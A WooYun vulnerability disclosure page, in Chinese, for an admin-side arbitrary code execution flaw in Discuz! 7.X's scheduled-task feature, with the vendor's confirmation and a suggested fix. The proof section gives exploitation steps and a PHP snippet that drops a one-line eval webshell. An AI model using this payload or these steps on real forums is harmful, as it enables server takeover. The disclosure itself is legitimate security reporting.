当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033063

漏洞标题:Discuz!7.X后台任意代码执行

相关厂商:Discuz!

漏洞作者: vakin

提交时间:2013-07-31 22:07

修复时间:2013-10-29 22:08

公开时间:2013-10-29 22:08

漏洞类型:命令执行

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-31: 细节已通知厂商并且等待厂商处理中
2013-08-01: 厂商已经确认,细节仅向厂商公开
2013-08-04: 细节向第三方安全合作伙伴开放
2013-09-25: 细节向核心白帽子及相关领域专家公开
2013-10-05: 细节向普通白帽子公开
2013-10-15: 细节向实习白帽子公开
2013-10-29: 细节向公众公开

简要描述:

Discuz!7.X后台设置不严格导致任意代码执行获得webshell

详细说明:

20130731210804.png


由于计划任务功能没有对文件名做任何限制导致只需要把文件上传到/include/crons/目录就可以执行

漏洞证明:

首先到全局附件设置修改上传目录

20130731211455.png


然后直接拿他本身存在的计划任务件
/include/crons/announcements_daily.inc.php修改内容为

<?php
/*
[Discuz!] (C)2001-2009 Comsenz Inc.
This is NOT a freeware, use is subject to license terms
$Id: announcements_daily.inc.php 17476 2008-12-25 02:58:18Z liuqiang $
*/
if(!defined('IN_DISCUZ')) {
exit('Access Denied');
}
fputs(fopen('1.php','w'),'<?php eval($_POST[cmd)?>\r\n');
?>


我是保存的11.txt,到论坛任意可以上传文件的板块发表新帖上传

20130731212812.png


到后台在附件管理可以获得上传的路径和文件名

20130731213457.png


我这里显示的是1307312134da261a93f37e3656.txt,记住这个文件名
把他写到计划任务里

20130731213935.png


提交后点执行1.php就在根目录生成了

修复方案:

强制计划任务文件后缀为php

版权声明:转载请注明来源 vakin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-08-01 16:43

厂商回复:

问题我们已经确认,感谢您的支持,我们会尽快修复。

最新状态:

暂无